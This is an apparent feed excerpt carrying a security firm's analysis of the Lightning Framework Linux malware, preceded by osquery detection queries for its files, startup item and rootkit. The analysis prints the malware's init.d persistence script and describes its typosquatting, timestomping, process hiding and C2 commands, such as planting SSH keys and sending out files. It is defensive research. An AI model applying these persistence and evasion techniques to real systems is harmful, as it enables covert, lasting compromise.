&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/research/lightning-framework-new-linux-threat/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible Lightning Framework files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;linux-startup-item&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT * FROM startup_items WHERE name = &amp;#39;elastisearch&amp;#39;;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/research/lightning-framework-new-linux-threat/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible Lightning Framework startup item&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;linux-kernel-module&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT * FROM kernel_modules WHERE name = &amp;#39;elastisearch&amp;#39;;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/research/lightning-framework-new-linux-threat/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;darwin&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible Lightning Framework rootkit&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>Lightning Framework: New Undetected "Swiss Army Knife" Linux Malware ⚡</title><link>https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/</link><pubDate>Thu, 21 Jul 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/</guid><description>
&lt;p&gt;&lt;em&gt;Lightning Framework is a new undetected Swiss Army Knife-like Linux malware
that has modular plugins and the ability to install rootkits.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Year after year Linux environments increasingly become the target of malware
due to continued threat actor interest in the space. Malware targeting Linux
environments surged in 2021, with a large amount of innovation
&lt;a href="https://www.ibm.com/downloads/cas/ADLMYLAZ"target="_blank" rel="noopener"&gt;resulting in new malicious code&lt;/a&gt;,
especially in ransomwares, trojans, and botnets. With the rise in use of the
cloud, it is no wonder that malware innovation is still accelerating at
breakneck speed in this realm.&lt;/p&gt;
&lt;p&gt;This is a technical analysis of a previously undocumented and undetected Linux
threat called the Lightning Framework. It is rare to see such an intricate
framework developed for targeting Linux systems. Lightning is a modular
framework we discovered that has a plethora of capabilities, and the ability to
install multiple types of rootkit, as well as the capability to run plugins.
The framework has both passive and active capabilities for communication with
the threat actor, including opening up SSH on an infected machine, and a
polymorphic malleable command and control configuration. We are releasing this
blog for informational purposes. We do not have all the files that are
referenced in the framework, but hope that this release will help others if
they possess other pieces of the jigsaw puzzle. We have not observed this
malware being used in attacks in the wild.&lt;/p&gt;
&lt;h2&gt;Technical Analysis of Lightning Framework&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis-of-lightning-framework"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis-of-lightning-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The framework consists of a downloader and core module, with a number of
plugins. Some of the plugins used by the malware are open-source tools. Below
is a figure of the framework layout:&lt;/p&gt;
&lt;h3&gt;Overview of the Modules&lt;span class="hx:absolute hx:-mt-20" id="overview-of-the-modules"&gt;&lt;/span&gt;
&lt;a href="#overview-of-the-modules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Name on Disk&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Lightning.Downloader&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;kbioset&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The persistent module that downloads the core module and its plugins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Lightning.Core&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;kkdmflush&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The main module of the Lightning Framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.SsHijacker&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;soss&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sshod&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OpenSSH with hardcoded private and host keys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.Nethogs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;nethoogs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet. Presumably the software &lt;a href="https://github.com/raboof/nethogs"target="_blank" rel="noopener"&gt;Nethogs&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.iftop&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;iftoop&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet. Presumably the software &lt;a href="https://linux.die.net/man/8/iftop"target="_blank" rel="noopener"&gt;iftop&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.iptraf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;iptraof&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet. Presumably the software &lt;a href="http://iptraf.seul.org/"target="_blank" rel="noopener"&gt;IPTraf&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.RootkieHide&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;libsystemd.so.2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet. LD_PRELOAD Rootkit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Kernel&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;elastisearch.ko&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;There is a reference to this module but no sample found in the wild yet. LKM Rootkit&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Lightning.Downloader&lt;span class="hx:absolute hx:-mt-20" id="lightningdownloader"&gt;&lt;/span&gt;
&lt;a href="#lightningdownloader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The main function of the downloader module is to fetch the other components and
execute the core module.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig1.png" title="Lightning Downloader result in Intezer Analyze" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Lightning Downloader result in Intezer Analyze&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The downloader module starts by checking if it is located in the working
directory &lt;code&gt;/usr/lib64/seahorses/&lt;/code&gt; under the name &lt;code&gt;kbioset&lt;/code&gt;. The framework makes
heavy use of typosquatting and masquerading in order to remain undetected. The
reference to &lt;code&gt;seahorses&lt;/code&gt; masquerades the password and key manager software
&lt;a href="https://gitlab.gnome.org/GNOME/seahorse"target="_blank" rel="noopener"&gt;seahorse&lt;/a&gt;. If not it will relocate
itself to that working directory and execute that copy. The downloader will
fingerprint the host name and network adapters to generate a GUID, which will
be sent to the command and control (C2) server.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig2.png" title="Building the GUID" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Building the GUID&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The downloader will then contact the C2 to fetch the following modules and
plugins:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Linux.Plugin.Lightning.SsHijacker&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Linux.Plugin.Lightning.Nethogs&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Linux.Plugin.Lightning.iftop&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Linux.Plugin.Lightning.iptraf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Lightning.Core&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig3.png" title="Resources fetched from the C2" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Resources fetched from the C2&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The method of contacting the C2 will be described below in the malleable C2
section (click here to jump to that section). The downloader will then execute
the core module (&lt;code&gt;kkdmflush&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig4.png" title="Execution of the core module" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Execution of the core module&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Lightning.Core&lt;span class="hx:absolute hx:-mt-20" id="lightningcore"&gt;&lt;/span&gt;
&lt;a href="#lightningcore" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The core module is the main module in this framework, it is able to receive
commands from the C2 and execute the plugin modules. The module has many
capabilities and uses a number of techniques to
&lt;a href="https://attack.mitre.org/techniques/T1564/"target="_blank" rel="noopener"&gt;hide artifacts&lt;/a&gt; to remain running
under the radar.&lt;/p&gt;
&lt;p&gt;The core module modifies the name of the calling thread of the module to
&lt;code&gt;kdmflush&lt;/code&gt;, to make it appear that it is a kernel thread.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig5.png" title="Using prctl to modify calling thread name" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Using prctl to modify calling thread name&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next the core module sets up persistence by creating a script that is executed
upon system &lt;a href="https://attack.mitre.org/techniques/T1037/"target="_blank" rel="noopener"&gt;boot&lt;/a&gt;. This is
achieved by first creating a file located at &lt;code&gt;/etc/rc.d/init.d/elastisearch&lt;/code&gt;.
The name appears to typosquat elasticsearch. The following contents are written
to the file:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;&lt;/span&gt;&lt;span class="c1"&gt;# chkconfig:2345 90 20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/usr/lib64/seahorses/kbioset &lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;This script will execute the downloader module upon boot. The service is then
added using the &lt;code&gt;chkconfig&lt;/code&gt; utility.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig6.png" title="Creation of the init.d script and service" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Creation of the init.d script and service&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The timestamp of the file is modified to hide artifacts, a technique known as
&amp;ldquo;&lt;a href="https://attack.mitre.org/techniques/T1070/006/"target="_blank" rel="noopener"&gt;timestomping&lt;/a&gt;&amp;rdquo;. The file has
its last modified time edited to match that of either &lt;code&gt;whoami&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, or
&lt;code&gt;su&lt;/code&gt;. It will look for each file respectively until it finds one. This
technique is used for most of the files that the framework creates.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig7.png" title="File timestamp modification function" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;File timestamp modification function&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The malware will attempt to hide its Process ID (PID) and any related network
ports. This is achieved by writing the frameworks running PIDs to two files:
&lt;code&gt;hpi&lt;/code&gt; and &lt;code&gt;hpo&lt;/code&gt;. These files are parsed and then the existence of the file
&lt;code&gt;proc/y.y&lt;/code&gt; is checked. If the file exists, it means that a rootkit has been
installed. The PIDs are written to &lt;code&gt;proc/y.y&lt;/code&gt; for use by the rootkit, which may
scrub any reference to files running in the framework from commands such as
&lt;code&gt;ps&lt;/code&gt; and &lt;code&gt;netstat&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig8.png" title="Writing PID to proc/y.y if it exists (Indication that rootkit exists)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Writing PID to proc/y.y if it exists (Indication that rootkit exists)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The core module will generate a GUID in the same manner as the downloader and
contact the C2. The response is parsed and the command is executed. The core
module has the following commands:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SystemInfo&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fingerprints the machine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PureShellCommand&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Runs Shell command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RunShellPure&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Starts the &lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt; (SSH Daemon) plugin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CloseShellPure&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Terminates the &lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt; plugin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Disconnect&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Exits the Core module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;GetRemotePathInfo&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Collects the summary of given path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;KeepAlive&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No action, connection remains alive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;UploadFileHeader&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Checks access of file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;FileEdit&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gets contents of file and time meta&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;TryPassSSH&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Adds a public key to the &lt;code&gt;root/.ssh/authorized_keys&lt;/code&gt; file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DeleteVecFile&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Deletes the specified file or path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PreDownloadFile&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Calculates a checksum of the file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DownloadFile&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sends a file to the C2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DeleteGuid&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Removes the framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;UpdateVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Calls the Downloader module to update the framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;UpdateRemoteVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Updates the framework including the downloader&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Socks5&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sets up a Socks5 proxy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RestorePlug&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The same as &lt;code&gt;UpdateVersion&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;GetDomainSetting&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fetches the contents of the malleable C2 configuration file (&lt;code&gt;cpc&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SetDomainSetting&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Updates the contents of the malleable C2 configuration file (&lt;code&gt;cpc&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;InstallKernelHide&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fetches the OS release&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RemoveKernelHide&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Removes kernel module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;UpdateKernelVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Removes the kernel module and runs &lt;code&gt;uname -r&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;OverrideFile&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Overwrites specified file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;UploadFileContent&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Writes data sent from server to file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;LocalPluginRequest&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Either write the LD_PRELOAD rootkit or LKM rootkit&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Network Communication&lt;span class="hx:absolute hx:-mt-20" id="network-communication"&gt;&lt;/span&gt;
&lt;a href="#network-communication" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Network communication in the Core and Downloader modules are performed over TCP
sockets. The data is structured in JSON. The C2 is stored in a polymorphic
encoded configuration file that is unique for every single creation. This means
that configuration files will not be able to be detected through techniques
such as hashes. The key is built into the start of the encoded file.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig9.png" title="Encoded malleable C2 configuration profile" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Encoded malleable C2 configuration profile&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
